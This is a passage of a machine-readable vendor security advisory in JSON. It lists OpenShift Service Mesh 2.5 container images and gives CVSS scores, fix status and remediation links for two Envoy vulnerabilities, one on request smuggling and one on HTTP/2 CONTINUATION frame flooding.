"name": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64 as a component of RHOSSM 2.5 for RHEL 8",
"product_id": "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-23326",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2024-01-19T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2259228"
}
],
"notes": [
{
"category": "description",
"text": "A possible request smuggling vulnerability exists through Envoy. This issue occurs if a server can be tricked into adding an upgrade header into a response.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-23326"
},
{
"category": "external",
"summary": "RHBZ#2259228",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259228"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-23326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23326"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-23326",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23326"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode"
},
{
"acknowledgments": [
{
"names": [
"Bartek Nowotarski"
],
"organization": "nowotarski.info"
}
],
"cve": "CVE-2024-30255",
"cwe": {
"id": "CWE-390",
"name": "Detection of Error Condition Without Action"
},
"discovery_date": "2024-04-02T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2272986"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in how Envoy Proxy implements the HTTP/2 codec. There are insufficient limitations placed on the amount of CONTINUATION frames that can be sent within a single stream. This issue could allow an unauthenticated remote attacker to send packets to vulnerable servers, which could use up compute resources to cause a Denial of Service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat rates the security impact of this vulnerability as Moderate, in alignment with upstream Envoy. The worst case scenario is excessive CPU utilization causing a denial of service. Once an attack has ended, the system should return to normal operations on its own.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
